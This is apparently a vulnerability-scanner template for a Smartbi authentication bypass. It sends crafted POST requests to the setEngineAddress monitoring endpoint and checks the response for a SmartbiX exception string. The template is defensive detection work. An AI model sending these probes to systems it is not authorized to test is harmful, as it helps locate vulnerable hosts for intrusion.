id: smartbi-auth-bypass

info:
  name: smartbi - Auth bypass
  author: unknown
  severity: high
  description: |
    Smartbi auth bypass.
  reference:
    - https://mp.weixin.qq.com/s/qwTzdnncx1rsswX04uFxCQ
  tags: smartbi

http:
  - raw:
      - |
        POST /smartbi/smartbix/api/monitor/setEngineAddress HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        className=UserService&methodName=isLogged&params=[]
      - |
        POST /smartbix/api/monitor/setEngineAddress HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        className=UserService&methodName=isLogged&params=[]
    matchers:
      - type: word
        words:
          - 'smartbix.SmartbiXException'
        part: body